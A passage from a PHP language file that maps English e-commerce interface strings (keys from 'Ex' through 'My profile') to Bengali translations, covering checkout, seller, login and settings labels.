5000' => 'এক্সাম্পল: 5000', 'Ex: 6+ character' => 'এক্সাম্পল: 6+ ক্যারেক্টার', 'Ex: https://play.google.com/store/apps' => 'Ex: https://play.google.com/store/apps', 'Ex: https://www.apple.com/app-store/' => 'Ex: https://www.apple.com/app-store/', 'Ex:01xxxxxxxxx' => 'এক্সাম্পল: 01xxxxxxxxxx', 'Ex:_01xxxxxxxxx' => 'এক্সাম্পল: 01xxxxxxxxxx', 'Ex:_1216_Dhaka' => 'এক্সাম্পল: 1216 Dhaka', 'Ex:_6+_character' => 'এক্সাম্পল: 6+ ক্যারেক্টার', 'Ex:_8+_character' => 'Ex: 8+ character', 'Ex:_Jhon_Doe' => 'এক্সাম্পল: জন ডো', 'Ex= 10' => 'এক্সাম্পল=> 10', 'Ex= 1216' => 'এক্সাম্পল=> 1216', 'Ex= 1234567890' => 'এক্সাম্পল=> 1234567890', 'Ex= 32416436546' => 'এক্সাম্পল=> 32416436546', 'Ex= 5' => 'এক্সাম্পল=> 5', 'Ex= 8+ Character' => 'এক্সাম্পল=> 8+ ক্যারেক্টার', 'Ex= 987652' => 'এক্সাম্পল=> 987652', 'Ex= 9876543210' => 'এক্সাম্পল=> 9876543210', 'Ex= Dhaka' => 'এক্সাম্পল=> Dhaka', 'Ex= EID_Dhamaka' => 'Ex=> EID Dhamaka', 'Ex= English' => 'এক্সাম্পল=> ইংরেজি', 'Ex= F-12345678' => 'এক্সাম্পল=> এফ -12345678', 'Ex= John Doe' => 'এক্সাম্পল=> জন দো', 'Ex= Street 1 Street 2 Street 3 Street 4' => 'এক্সাম্পল=> স্ট্রিট 1 স্ট্রিট 2 স্ট্রিট 3 স্ট্রিট 4', 'Ex= _01XXXXXX' => 'এক্সাম্পল=> 01xxxxxx', 'Ex= _6+ character' => 'এক্সাম্পল=> 6+ ক্যারেক্টার', 'Ex= _8+_character' => 'এক্সাম্পল=> 8+ ক্যারেক্টার', 'Ex= _Doe' => 'এক্সাম্পল=> ডো', 'Ex= _Jhone' => 'এক্সাম্পল=> জন', 'Ex= _Riad_Uddin' => 'এক্সাম্পল=> riad uddin', 'Ex= abcd1234efgh5678ijklmnop90qrstuvwxYZ' => 'এক্সাম্পল=> ABCD1234EFGH5678IJKLMNOP90QRSTUVWXYZ', 'Ex= https= //play.google.com/store/apps' => 'এক্সাম্পল=> https=>//play.google.com/store/apps', 'Ex= https= //www.apple.com/app-store/' => 'এক্সাম্পল=> https=>//www.apple.com/app-sore/', 'Ex= john@gmail.com' => 'এক্সাম্পল=> jon@gmail.com', 'Ex= my-awesome-app-12345' => 'এক্সাম্পল=> my-awesome-app -12345', 'Ex= my-awesome-app.appspot.com' => 'এক্সাম্পল=> my-awesome-app.appspot.com', 'Ex= my-awesome-app.firebaseapp.com' => 'এক্সাম্পল=> my-awesome-app.appspot.com', 'Ex_:_Shop_-12_Road-8' => 'Ex : শপ -12 রোড-8', 'Ex_= _Shop_-12_Road-8' => 'এক্সাম্পল=> শপ -12 রোড -8', 'Ex_= _ex@example.com' => 'এক্সাম্পল=> ex@example.com', 'Excel' => 'এক্সেল', 'Excellent' => 'দুর্দান্ত', 'Exchange Rate' => 'বিনিময় হার', 'Exclusive & Fashionable Suit For Men' => 'পুরুষদের জন্য এক্সক্লুসিভ এন্ড ফ্যাশনেবল স্যুট', 'Expand Menu' => 'মেনু প্রসারিত করুন', 'Expand cart' => 'কার্ট প্রসারিত করুন', 'Expand menu' => 'মেনু প্রসারিত করুন', 'Expense Amount' => 'ব্যয়ের পরিমাণ', 'Expense Type' => 'ব্যয় প্রকার', 'Expense_Amount' => 'ব্যয়ের পরিমাণ', 'Expense_Transaction_Statement' => 'ব্যয় ট্রান্সেকশন স্টেটমেন্ট', 'Expense_Transactions' => 'ব্যয় ট্রান্সেকশন', 'Expense_Type' => 'ব্যয় প্রকার', 'Explore' => 'এক্সপ্লোর', 'Explore_Now' => 'এখন এক্সপ্লোর', 'Export' => 'এক্সপোর্ট', 'Extra_discount_can_not_be_more_than_100_percent' => 'অতিরিক্ত ছাড় 100 শতাংশের বেশি হতে পারে না', 'FAQ' => 'সচরাচর জিজ্ঞাস্য', 'FAQ deleted successfully' => 'FAQ সফলভাবে মুছে ফেলা হয়েছে', 'FAQ_deleted_successfully' => 'FAQ deleted successfully', 'FAQs' => 'সচরাচর জিজ্ঞাস্য', 'FCM Project ID' => 'এফসিএম প্রকল্প আইডি', 'FCM Settings' => 'এফসিএম সেটিংস', 'FCM_Project_ID' => 'এফসিএম প্রকল্প আইডি', 'FCM_Settings' => 'এফসিএম সেটিংস', 'FREE' => 'বিনামূল্যে', 'Facebook' => 'ফেসবুক', 'Facebook API Set up Instructions' => 'ফেসবুক এপিআই নির্দেশাবলী সেট আপ', 'Facebook Login' => 'ফেসবুক লগইন', 'Failed' => 'ব্যর্থ', 'Failed To Deliver' => 'পেমেন্ট করতে ব্যর্থ', 'Failed_To_Delivery' => 'ডেলিভারি করতে ব্যর্থ', 'Failed_to_Deliver' => 'পেমেন্ট করতে ব্যর্থ', 'Failed_to_deliver' => 'ডেলিভারি করতে ব্যর্থ', 'False' => 'মিথ্যা', 'Fast Delivery all accross the country' => 'দ্রুত ডেলিভারি সমস্ত দেশকে আদায় করে', 'Feature Deal' => 'ফীচার ডিল', 'Feature Deal Update' => 'ফীচার ডিল আপডেট', 'Featured' => 'ফীচার', 'Featured status সফলভাবে আপডেট করা হয়েছে৷' => 'ফীচার স্ট্যাটাস সফলভাবে আপডেট হয়েছে', 'Featured_Deal' => 'ফীচার ডিল', 'Featured_Deals' => 'ফীচার ডিল', 'Featured_Products' => 'ফীচার পণ্য', 'Fee' => 'ফি', 'Feedback' => 'প্রতিক্রিয়া', 'File' => 'ফাইল', 'File size too big' => 'ফাইলের আকার খুব বড়', 'File type: jpg jpeg png. Maximum size= 2MB' => 'ফাইলের ধরণ: জেপিজি জেপিইজি পিএনজি। সর্বাধিক আকার=> 2 এমবি', 'File type= jpg jpeg png gif zip pdf' => 'ফাইলের ধরণ=> জেপিজি জেপিইজি পিএনজি জিআইএফ জিপ পিডিএফ', 'File_type:_jpg_jpeg_png._Maximum_size' => 'ফাইলের ধরণ: জেপিজি জেপিইজি পিএনজি। সর্বাধিক আকার', 'File_type:_jpg_jpeg_png._Maximum_size:_2MB' => 'ফাইলের ধরণ: জেপিজি জেপিইজি পিএনজি। সর্বাধিক আকার: 2 এমবি', 'File_type:_jpg_jpeg_png._Maximum_size= _2MB' => 'ফাইলের ধরণ: জেপিজি জেপিইজি পিএনজি। সর্বাধিক আকার: 2 এমবি', 'Fill in your email address below' => 'নীচে আপনার ইমেল ঠিকানা পূরণ করুন', 'Fill the form and press' => 'ফর্মটি পূরণ করুন এন্ড প্রেস', 'Fill_all_required_fields_of_billing_address' => 'বিলিং ঠিকানার সমস্ত প্রয়োজনীয় ক্ষেত্রগুলি পূরণ করুন', 'Fill_all_required_fields_of_shipping/billing_address' => 'শিপিং/বিলিং ঠিকানার সমস্ত প্রয়োজনীয় ক্ষেত্রগুলি পূরণ করুন', 'Fill_all_required_fields_of_shipping_address' => 'শিপিং ঠিকানার সমস্ত প্রয়োজনীয় ক্ষেত্রগুলি পূরণ করুন', 'Filter' => 'ফিল্টার', 'Filter_Data' => 'ফিল্টার ডেটা', 'Filter_Report' => 'ফিল্টার রিপোর্ট', 'Filtered' => 'ফিল্টারড', 'Final_Total' => 'চূড়ান্ত মোট', 'Find' => 'সার্চ', 'Find_What_You_Need' => 'আপনার যা প্রয়োজন তা সন্ধান করুন', 'Find_and_select_products_to_see_the_differences_and_similarities_between_them' => 'তাদের মধ্যে পার্থক্য এন্ড মিল দেখতে পণ্যগুলি সন্ধান করুন এন্ড নির্বাচন করুন', 'Find_us' => 'আমাদের খোজ', 'Firebase Configuration' => 'ফায়ারবেস কনফিগারেশন', 'Firebase Push Notification Setup' => 'ফায়ারবেস পুশ নোটিফিকেশন সেটআপ', 'First' => 'প্রথম', 'First name is required!' => 'প্রথম নাম প্রয়োজন!', 'First step' => 'প্রথম ধাপ', 'First_Name' => 'নামের প্রথম অংশ', 'First_Order' => 'প্রথম অর্ডার', 'First_Shipping' => 'প্রথম শিপিং', 'First_Shipping_all_accross_the_country' => 'প্রথম শিপিং সমস্ত দেশকে আদর করুন', 'First_Shipping_all_across_the_country' => 'সারা দেশে প্রথম শিপিং', 'Flash Deal' => 'ফ্ল্যাশ ডিল', 'Flash Deal Products' => 'ফ্ল্যাশ ডিল পণ্য', 'Flash Deal Update' => 'ফ্ল্যাশ ডিল আপডেট', 'Flash Deals' => 'ফ্ল্যাশ ডিল', 'Flash Sale for Any Item' => 'যে কোনও আইটেমের জন্য ফ্ল্যাশ বিক্রয়', 'Flash_Deal' => 'ফ্ল্যাশ ডিল', 'Flash_Deals' => 'ফ্ল্যাশ ডিল', 'Flat' => 'সমান', 'Follow' => 'অনুসরণ করুন', 'Follow the documentation to setup from app end' => 'অ্যাপ এন্ড থেকে সেটআপ করতে ডকুমেন্টেশন অনুসরণ করুন', 'Follow_Complete' => 'সম্পূর্ণ অনুসরণ করুন', 'Followers' => 'অনুগামী', 'Footer Banner' => 'ফুটার ব্যানার', 'Footer_Banner' => 'ফুটার ব্যানার', 'For mobile app only' => 'শুধুমাত্র মোবাইল অ্যাপ্লিকেশন জন্য', 'For multi vendor operation' => 'মাল্টি বিক্রেতা অপারেশনের জন্য', 'For single vendor operation' => 'একক বিক্রেতা অপারেশন জন্য', 'For single vendor operation deactive all seller!!' => 'একক বিক্রেতা অপারেশনের জন্য সমস্ত বিক্রেতার ডেস্টিভ !!', 'For single vendor operation please deactive all seller product' => 'একক বিক্রেতার অপারেশনের জন্য দয়া করে সমস্ত বিক্রেতা পণ্যটি নিষ্ক্রিয় করুন', 'Forget Password' => 'পাসওয়ার্ড ভুলে গেছেন', 'Forgot Password' => 'পাসওয়ার্ড ভুলে গেছেন', 'Forgot your password' => 'আপনি কি পাসওয়ার্ড ভুলে গেছেন', 'Forgot_Password' => 'পাসওয়ার্ড ভুলে গেছেন', 'Fourth step' => 'চতুর্থ পদক্ষেপ', 'Framerce' => 'ফ্রেমস', 'Free Delivery' => 'বিনামূল্যে ডেলিভারি', 'Free_Delivery' => 'বিনামূল্যে ডেলিভারি', 'Free_Delivery_Amount' => 'বিনামূল্যে ডেলিভারি পরিমাণ', 'Free_Delivery_Coupon' => 'বিনামূল্যে ডেলিভারি কুপন', 'Free_Delivery_on_Coupon_Discount' => 'কুপন ছাড়ের উপর বিনামূল্যে ডেলিভারি', 'Free_Shipping' => 'বিনামূল্যে শিপিং', 'Free_Shipping_on_all_Order_Above_$560' => '$ 560 এর উপরে সমস্ত ক্রমে বিনামূল্যে শিপিং', 'Fresh_Product' => 'ফ্রেশ পণ্য', 'From' => 'থেকে', 'From About You tab press' => 'আপনার সম্পর্কে ট্যাব প্রেস থেকে', 'From Contact Info tab provide' => 'যোগাযোগের তথ্য ট্যাব থেকে সরবরাহ করুন', 'From Register tab press' => 'রেজিস্টার ট্যাব প্রেস থেকে', 'From Verify Account tab' => 'যাচাই অ্যাকাউন্ট ট্যাব থেকে', 'Full' => 'সম্পূর্ণ', 'Full Name' => 'পুরো নাম', 'GST' => 'জিএসটি', 'GST Number' => 'জিএসটি নম্বর', 'GST_Number' => 'জিএসটি নম্বর', 'Gadgets' => 'গ্যাজেটস', 'Gamming Laptop' => 'গ্যামিং ল্যাপটপ', 'General Info' => 'সাধারণ তথ্য', 'General_Info' => 'সাধারণ তথ্য', 'General_Information' => 'সাধারণ জ্ঞাতব্য', 'General_info' => 'সাধারণ তথ্য', 'Generate Sitemap' => 'সাইটম্যাপ জেনারেট করুন', 'Generate_Site_Map' => 'সাইটের মানচিত্র তৈরি করুন', 'Generate_Sitemap' => 'সাইটম্যাপ জেনারেট করুন', 'Geothermal Air Conditioner' => 'জিওথার্মাল এয়ার কন্ডিশনার', 'Get Started' => 'এবার শুরু করা যাক', 'Get new password' => 'নতুন পাসওয়ার্ড পেতে', 'Gil Watkins' => 'গিল ওয়াটকিন্স', 'Go Back' => 'ফিরে যাও', 'Go to' => 'যাও', 'Go to Apple Developer page' => 'অ্যাপল বিকাশকারী পৃষ্ঠায় যান', 'Go to the Credentials page' => 'ক্রেডেনটিয়াল পৃষ্ঠায় যান', 'Go to the facebook developer page' => 'ফেসবুক বিকাশকারী পৃষ্ঠায় যান', 'Go to the facebook developer page and' => 'ফেসবুক ডেভেলপার পৃষ্ঠায় যান এন্ড', 'Go to your order' => 'আপনার অর্ডারে যান', 'Go_Back' => 'ফিরে যাও', 'Go_To_Chatbox' => 'চ্যাটবক্সে যান', 'Go_back' => 'ফিরে যাও', 'Go_to_the_Credentials_page' => 'ক্রেডেনটিয়াল পৃষ্ঠায় যান', 'Good' => 'ভাল', 'Google API Set up Instructions' => 'গুগল এপিআই নির্দেশাবলী সেট আপ করুন', 'Google plus' => 'গুগল প্লাস', 'Google_Map_APIs' => 'গুগল মানচিত্র এপিআই', 'Google_Recapcha_Information' => 'গুগল রেকাপচা তথ্য', 'Got It' => 'বুজেছি', 'Got_It' => 'বুজেছি', 'Great Hall' => 'দুর্দান্ত হল', 'Grid_View' => 'গ্রিড ভিউ', 'HI' => 'ওহে', 'HMAC' => 'এইচএমএসি', 'HOME' => 'হোম', 'Happy_Club' => 'হ্যাপি ক্লাব', 'Hard disk' => 'হার্ড ডিস্ক', 'Have_an_Account' => 'একাউন্ট আছে', 'Head Office' => 'সদর দফতর', 'Header Banner' => 'শিরোনাম ব্যানার', 'Headphones' => 'হেডফোন', 'Hello' => 'হ্যালো', 'Hello Store' => 'হ্যালো স্টোর', 'Help & Support' => 'সাহায্য সহযোগীতা', 'Help_&_Support' => 'সাহায্য সহযোগীতা', 'Help_&_Support_Section' => 'সহায়তা ও সাপোর্ট ক্যাটাগরি', 'Here in top left corner you can see the' => 'এখানে শীর্ষ বাম কোণে আপনি দেখতে পারেন', 'High' => 'উচ্চ', 'High_to_Low' => 'উচ্চ থেকে কম', 'High_to_Low_Price' => 'উচ্চ থেকে কম দাম', 'Holder Name' => 'ধারক নাম', 'Holder_Name' => 'ধারক নাম', 'Home' => 'হোম', 'Home Improvement & Tools' => 'হোম উন্নতি এন্ড সরঞ্জাম', 'Home Pet & Appliances' => 'হোম পোষা প্রাণী এন্ড সরঞ্জাম', 'Home_(Shipping_Address)' => 'হোম (শিপিং ঠিকানা)', 'Host' => 'হোস্ট', 'Hot Selling Sneakers Sneakers Men Casual Shoes Men Fashion Sneakers Fly knit Li' => 'গরম বিক্রয় স্নিকার্স স্নিকার্স পুরুষদের নৈমিত্তিক জুতা পুরুষ ফ্যাশন স্নিকার্স ফ্লাই নিট লি', 'Hotline' => 'হটলাইন', 'How_the_Setting_Works' => 'সেটিং কীভাবে কাজ করে', 'How_to_use' => 'কিভাবে ব্যবহার করে', 'Hurry_up' => 'তারাতারি করুন', 'ID' => 'আইডি', 'I_agree_with_the' => 'আমি তার সাথে একমত', 'Id' => 'আইডি', 'If GST number is disabled here it will not show in invoice' => 'যদি জিএসটি নম্বর এখানে ডিস্যাবল থাকে তবে এটি প্রিন্টে প্রদর্শিত হবে না', 'If needed' => 'প্রয়োজন হলে', 'If sales commission is disabled here the system default commission will be applied' => 'যদি বিক্রয় কমিশন এখানে ডিস্যাবল থাকে তবে সিস্টেম ডিফল্ট কমিশন প্রয়োগ করা হবে', 'If the user fails to get the OTP within a certain time user can request a resend' => 'যদি ব্যবহারকারী কোনও নির্দিষ্ট সময়ের মধ্যে ওটিপি পেতে ব্যর্থ হয় তবে ব্যবহারকারী কোনও পুনরায় পাঠানোর জন্য অনুরোধ করতে পারেন', 'If you need help or you have any other questions feel free to email us' => 'আপনার যদি সাহায্যের প্রয়োজন হয় বা আপনার অন্য কোনও প্রশ্ন থাকে আমাদের ইমেল করুন নির্দ্বিধায়', 'If you require any assistance or have feedback or suggestions about our site you can email us at' => 'আপনার যদি আমাদের সাইট সম্পর্কে কোনো সহায়তার প্রয়োজন হয় বা প্রতিক্রিয়া বা পরামর্শ থাকে তবে আপনি আমাদের ইমেল করতে পারেন', 'If_disabled_admin_can_deliver_orders_only_within_his_country' => 'যদি ডিস্যাবল হয় অ্যাডমিন কেবল তার দেশের মধ্যে অর্ডার সরবরাহ করতে পারে', 'If_disabled_sellers_can_not_sell_digital_products_in_their_shops' => 'যদি ডিস্যাবল হয় বিক্রেতারা তাদের দোকানে ডিজিটাল পণ্য বিক্রি করতে পারে না', 'If_disabled_there_will_be_no_delivery_restrictions_for_admin_or_sellers' => 'ডিস্যাবল হলে অ্যাডমিন বা বিক্রেতাদের জন্য কোনো ডেলিভারি সীমাবদ্ধতা থাকবে না', 'If_enabled_admin_can_deliver_orders_beyond_his_country' => 'যদি এনাবল হয় অ্যাডমিন তার দেশের বাইরে অর্ডার সরবরাহ করতে পারে', 'If_enabled_sellers_can_sell_digital_products_in_their_shops' => 'যদি এনাবল হয় বিক্রেতারা তাদের দোকানে ডিজিটাল পণ্য বিক্রি করতে পারে', 'If_enabled_the_admin_or_seller_can_deliver_orders_to_the_selected_countries' => 'এনাবল হলে এডমিন বা বিক্রেতা নির্বাচিত দেশগুলিতে অর্ডার সরবরাহ করতে পারে৷', 'If_you_require_any_assistance_or_have_feedback_or_suggestions_about_our_site _you' => 'আপনার যদি কোনও সহায়তার প্রয়োজন হয় বা আমাদের সাইট সম্পর্কে প্রতিক্রিয়া বা পরামর্শ থাকে', 'Image' => 'চিত্র', 'Image ratio should be' => 'চিত্র অনুপাত হওয়া উচিত', 'Image ratio should be 1:1' => 'চিত্র অনুপাত 1:1 হওয়া উচিত', 'Image uploaded successfully' => 'চিত্র সফলভাবে আপলোড করা হয়েছে', 'Image_Ratio' => 'চিত্র অনুপাত', 'Image_Ration' => 'চিত্র রেশিও', 'Image_Ration_1:1' => 'চিত্র রেশন 1:1', 'Image_format_-_jpg _jpeg _png' => 'চিত্র ফর্ম্যাট - জেপিজি জেপিইজি পিএনজি', 'Image_ratio_should_be' => 'চিত্র অনুপাত হওয়া উচিত', 'Image_size_must_be_within' => 'চিত্রের আকার অবশ্যই মধ্যে থাকতে হবে', 'Image_type_must_be_within' => 'চিত্রের ধরণ অবশ্যই মধ্যে থাকতে হবে', 'Import Products File' => 'পণ্য ফাইল আমদানি করুন', 'In about section select' => 'ক্যাটাগরিে নির্বাচন করুন', 'In-Active' => 'নিষ্ক্রিয়', 'In-House' => 'ইন-হাউস', 'In-House Earning' => 'ইন-হাউস উপার্জন', 'In-House Orders' => 'ইন-হাউস অর্ডার', 'In-House Product Discount' => 'ইন-হাউস পণ্য ছাড়', 'In-House Products' => 'ইন-হাউস পণ্য', 'In-House_Order' => 'ইন-হাউস অর্ডার', 'In-House_Product_List' => 'ইন-হাউস পণ্য তালিকা', 'In-House_Shop' => 'ইন-হাউস শপ', 'In-House_Store_Banner' => 'ইন-হাউস স্টোর ব্যানার', 'In-House_earning' => 'ইন-হাউস উপার্জন', 'In-Stock' => 'স্টক', 'In-house' => 'ইন-হাউস', 'InHouse Products' => 'ইনহাউস পণ্য', 'InHouse product sale report' => 'ইনহাউস পণ্য বিক্রয় প্রতিবেদন', 'In_Compare' => 'কম্পেয়ার', 'In_House' => 'ইন হাউস', 'In_Stock' => 'স্টক', 'Inactive' => 'নিষ্ক্রিয়', 'Inactive_Products' => 'নিষ্ক্রিয় পণ্য', 'Inbox' => 'ইনবক্স', 'Incomplete ব্যাংক তথ্য' => 'অসম্পূর্ণ ব্যাংক তথ্য', 'Infinity' => 'অনন্ত', 'Info' => 'তথ্য', 'Info inquiry' => 'তথ্য তদন্ত', 'Info সফলভাবে আপডেট করা হয়েছে৷!' => 'তথ্য সফলভাবে আপডেট হয়েছে!', 'Info_inquiry' => 'তথ্য তদন্ত', 'Informations' => 'তথ্য', 'Inhouse product sale Report' => 'ইনহাউস পণ্য বিক্রয় প্রতিবেদন', 'Input Field Type' => 'ইনপুট ক্ষেত্রের ধরণ', 'Instagram' => 'ইনস্টাগ্রাম', 'Instruction will be available very soon' => 'নির্দেশ খুব শীঘ্রই এভেইল্যাবল হবে', 'Instructions' => 'নির্দেশাবলী', 'Internet Cable' => 'ইন্টারনেট তারের', 'Invalid Order Id or Phone Number' => 'ইনভ্যালিড অর্ডার আইডি বা ফোন নম্বর', 'Invalid Phone Number' => 'অচল ফোন নম্বর', 'Invalid credential or account no verified yet' => 'ইনভ্যালিড ক্রেডেনটিয়াল বা অ্যাকাউন্ট এখনও যাচাই করা হয়নি', 'Invalid credential or account suspended' => 'ইনভ্যালিড ক্রেডেনটিয়াল বা অ্যাকাউন্ট সাসপেন্ড', 'Invalid date range' => 'ইনভ্যালিড তারিখের পরিসীমা', 'Invalid review!' => 'ইনভ্যালিড রিভিউ!', 'Invalid withdraw request' => 'ইনভ্যালিড উইথড্র অনুরোধ', 'Invoice' => 'প্রিন্ট', 'Is Required' => 'দরকার', 'Item' => 'আইটেম', 'Item Details' => 'আইটেম ডিটেলস', 'Item has been added in your cart!' => 'আপনার কার্টে আইটেম যুক্ত করা হয়েছে!', 'Item has been removed from cart' => 'আইটেমটি কার্ট থেকে সরানো হয়েছে', 'Item has been removed from cart ' => 'আইটেমটি কার্ট থেকে সরানো হয়েছে', 'Item_Details' => 'আইটেম ডিটেলস', 'Item_Price' => 'আইটেমের দাম', 'Item_has_been_removed_from_cart' => 'আইটেমটি কার্ট থেকে সরানো হয়েছে', 'Item_has_been_removed_from_cart ' => 'আইটেমটি কার্ট থেকে সরানো হয়েছে', 'Items' => 'আইটেম', 'Items Ordered' => 'অর্ডারকৃত সামগ্রী', 'Items Price' => 'আইটেমের দাম', 'Jewelry' => 'গহনা', 'Jewelry & Watches' => 'গহনা ও ঘড়ি', 'Jhon' => 'জন', 'Joined' => 'যোগদান', 'Joined At' => 'যোগদান', 'Just_reorder_from_your_previous_orders' => 'আপনার পূর্ববর্তী অর্ডারগুলি থেকে কেবল পুনরায় অর্ডার করুন', 'Just_reorder_from_your_previous_orders.' => 'আপনার পূর্ববর্তী অর্ডারগুলি থেকে কেবল পুনরায় অর্ডার করুন।', 'KR Fashion' => 'কেআর ফ্যাশন', 'Kevin Barr' => 'কেভিন বার', 'Key' => 'চাবি', 'Key removed successfully' => 'কী সফলভাবে সরানো হয়েছে', 'Key translated successfully' => 'কী সফলভাবে অনুবাদ', 'Keyboard & Mouse' => 'কীবোর্ড এন্ড মাউস', 'Kids Wood Table and 4 Chair Set Natural Table Assorted Color Chairs' => 'বাচ্চাদের কাঠের টেবিল এন্ড 4 চেয়ার সেট প্রাকৃতিক টেবিল মিশ্রিত রঙ চেয়ার', 'LTR' => 'এলটিআর', 'LUX' => 'লাক্স', 'Ladies Bag' => 'মহিলা ব্যাগ', 'Ladies Watch' => 'মহিলারা দেখুন', 'Ladies Winter Long Sleeve Sweater' => 'মহিলা শীতকালীন দীর্ঘ হাতা সোয়েটার', 'Language' => 'ভাষা', 'Language Translate' => 'ভাষা অনুবাদ', 'Languages' => 'ভাষা', 'Laptop Tabs & Notebooks' => 'ল্যাপটপ ট্যাব এন্ড নোটবুক', 'Laptop cooler' => 'ল্যাপটপ কুলার', 'Last' => 'শেষ', 'Last Name' => 'নামের শেষাংশ', 'Last Updated' => 'সর্বশেষ সংষ্করণ', 'Last Updated Stock' => 'সর্বশেষ আপডেট স্টক', 'Last name is required!' => 'শেষ নাম প্রয়োজন!', 'Last_Name' => 'নামের শেষাংশ', 'Latest' => 'সর্বশেষ', 'Latest_Product' => 'সর্বশেষ পণ্য', 'Latest_Products' => 'সাম্প্রতিক পণ্যসমূহ', 'Leave a Message' => 'একটি মেসেজ রেখে যান', 'Leave_a_comment' => 'মতামত দিন', 'Leave_your_issue' => 'আপনার সমস্যা ছেড়ে দিন', 'Left' => 'বাম', 'Let_us_Shopping_Today' => 'আজ কেনাকাটা করা যাক', 'Lets_Shopping_Today' => 'আজ শপিং করা যাক', 'Limit' => 'সীমা', 'Limited Sotcks' => 'সীমাবদ্ধ স্টক', 'Limited_Stocked_Products_List' => 'সীমিত স্টক পণ্য তালিকা', 'Limited_Stocks' => 'সীমিত স্টক', 'LinkedIn' => 'লিঙ্কডইন', 'List' => 'তালিকা', 'List_View' => 'তালিকা দেখুন', 'Live' => 'লাইভ দেখান', 'Live_Chat' => 'সরাসরি কথোপকথন', 'Loading Gif' => 'জিআইএফ লোড হচ্ছে', 'Log in into your Facebook account (if youre not)' => 'আপনার ফেসবুক অ্যাকাউন্টে লগ ইন করুন (যদি আপনি তা না করেন)', 'Login' => 'লগ ইন', 'Login Turned OFF ' => 'লগইন বন্ধ', 'Login Turned ON ' => 'লগইন চালু', 'Login is now disabled. Customers will not be able to sign up or log in using their social media accounts. Please note that this may affect user experience and registration/login process.' => 'লগইন এখন ডিস্যাবল। গ্রাহকরা তাদের সোশ্যাল মিডিয়া অ্যাকাউন্টগুলি ব্যবহার করে সাইন আপ বা লগ ইন করতে এনাবল হবেন না। দয়া করে নোট করুন যে এটি ব্যবহারকারীর অভিজ্ঞতা এন্ড নিবন্ধকরণ/লগইন প্রক্রিয়াটিকে প্রভাবিত করতে পারে।', 'Login is now enabled. Customers will be able to sign up or log in using their social media accounts.' => 'লগইন এখন এনাবল। গ্রাহকরা তাদের সোশ্যাল মিডিয়া অ্যাকাউন্টগুলি ব্যবহার করে সাইন আপ বা লগ ইন করতে এনাবল হবেন।', 'Login_Now' => 'এখন লগ ইন করুন', 'Login_successful' => 'সফল লগইন', 'Logout' => 'লগ আউট', 'London Beauty Soap Bar' => 'লন্ডন বিউটি সাবান বার', 'Low' => 'কম', 'Low_to_High' => 'কম থেকে বেশি', 'Low_to_High_Price' => 'কম থেকে উচ্চ মূল্য', 'Loyalty Point' => 'লয়াল্টি পয়েন্ট', 'Loyalty_Point' => 'লয়াল্টি পয়েন্ট', 'Loyalty_Points' => 'লয়াল্টি পয়েন্ট', 'Mail Config' => 'মেল কনফিগার', 'Mail_Body' => 'মেল বডি', 'Mail_Config' => 'মেল কনফিগার', 'Main Banner' => 'প্রধান ব্যানার', 'Main Section Banner' => 'মূল ক্যাটাগরি ব্যানার', 'Main_Banner' => 'প্রধান ব্যানার', 'Main_Banner_updated_Successfully' => 'মেইন ব্যানার সফলভাবে আপডেট হয়েছে', 'Maintenance Mode on' => 'রক্ষণাবেক্ষণ মোড চালু', 'Maintenance_Mode' => 'রক্ষণাবেক্ষণ মোড', 'Make sure to check' => 'চেক করে দেখুন', 'Man Watch' => 'ম্যান ওয়াচ', 'Manage_Deliveries' => 'ডেলিভারি পরিচালনা', 'Marketing_Section' => 'মার্কেটিং ক্যাটাগরি', 'Mart Morning' => 'মার্ট মর্নিং', 'Max' => 'সর্বোচ্চ', 'Mechanical' => 'যান্ত্রিক', 'Medium' => 'মধ্যম', 'Men s fashion' => 'পুরুষদের ফ্যাশন', 'Menu' => 'তালিকা', 'Merchant' => 'বণিক', 'Message' => 'মেসেজ', 'Message_Log' => 'মেসেজ লগ', 'Message_View' => 'মেসেজ দেখুন', 'Message_updated' => 'মেসেজ আপডেট হয়েছে', 'Messages' => 'মেসেজ', 'Meta Description' => 'মেটা বর্ণনা', 'Meta Image' => 'মেটা চিত্র', 'Meta Title' => 'মেটা শিরোনাম', 'Meta_Description' => 'মেটা বর্ণনা', 'Meta_Image' => 'মেটা চিত্র', 'Meta_Title' => 'মেটা শিরোনাম', 'Meta_description' => 'মেটা বর্ণনা', 'Meta_image' => 'মেটা চিত্র', 'Meta_title' => 'মেটা শিরোনাম', 'Method' => 'পদ্ধতি', 'Method_name' => 'পদ্ধতির নাম', 'Microphones' => 'মাইক্রোফোন', 'Microwaves' => 'মাইক্রোওয়েভস', 'Min' => 'সর্বনিম্ন', 'Minimum' => 'সর্বনিম্ন', 'Minimum_' => 'সর্বনিম্ন', 'Minimum_200_Points_required_to_convert_Into_currency' => 'মুদ্রায় রূপান্তর করতে সর্বনিম্ন 200 পয়েন্ট প্রয়োজন', 'Minimum_200_points_required_to_convert' => 'রূপান্তর করতে ন্যূনতম 200 পয়েন্ট প্রয়োজন', 'Mobile' => 'মুঠোফোন', 'Mobile Accessories' => 'মোবাইল আনুষাঙ্গিক', 'Modentum' => 'একটি সংযম মধ্যে', 'More From The Store' => 'স্টোর থেকে আরও', 'More_Brands' => 'আরও ব্র্যান্ড', 'More_Categories' => 'আরও ক্যাটাগরি', 'More_from_the_Store' => 'স্টোর থেকে আরও', 'Morning Mart' => 'মর্নিং মার্ট', 'Most_Demanded_Product' => 'সর্বাধিক চাহিদা পণ্য', 'Most_Favorite' => 'মোস্ট ফেভারিট', 'Most_Loved' => 'সর্বাধিক প্রিয়', 'Most_Popular_Stores' => 'সর্বাধিক জনপ্রিয় স্টোর', 'Most_Searching' => 'সর্বাধিক সার্চ', 'Most_Visited_Categories' => 'সর্বাধিক পরিদর্শন ক্যাটাগরি', 'Multi-currency is depends on exchange rate and your gateway configuration So if you don t need multi-currency it will be better select single currency. (We prefer to use single currency).' => 'মাল্টি-মুদ্রা বিনিময় হার এন্ড আপনার গেটওয়ে কনফিগারেশনের উপর নির্ভর করে তাই আপনার যদি মাল্টি-মুদ্রার প্রয়োজন হয় না তবে এটি আরও ভাল একক মুদ্রা নির্বাচন করুন। (আমরা একক মুদ্রা ব্যবহার করতে পছন্দ করি)।', 'My Address' => 'আমার ঠিকানা', 'My Loyalty Point' => 'আমার লয়াল্টি পয়েন্ট', 'My Order' => 'আমার অর্ডার', 'My Order List' => 'আমার অর্ডার তালিকা', 'My Shopping Cart' => 'আমার শপিং কার্ট', 'My Support Tickets' => 'আমার সাপোর্ট টিকিট', 'My Wallet' => 'আমার ওয়ালেট ', 'My Wishlists' => 'আমার উইশ লিস্ট', 'My profile' => 'আমার 